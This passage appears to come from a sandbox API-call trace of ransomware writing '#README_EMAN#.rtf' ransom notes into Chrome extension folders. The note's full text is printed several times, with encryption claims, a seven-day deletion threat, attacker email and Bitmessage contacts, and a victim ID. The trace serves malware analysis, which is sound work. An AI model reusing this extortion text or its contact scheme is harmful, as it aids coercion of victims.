th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.184] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.185] CloseHandle (hObject=0x2e8) returned 1 [0292.185] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0292.185] GetLastError () returned 0x2 [0292.185] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 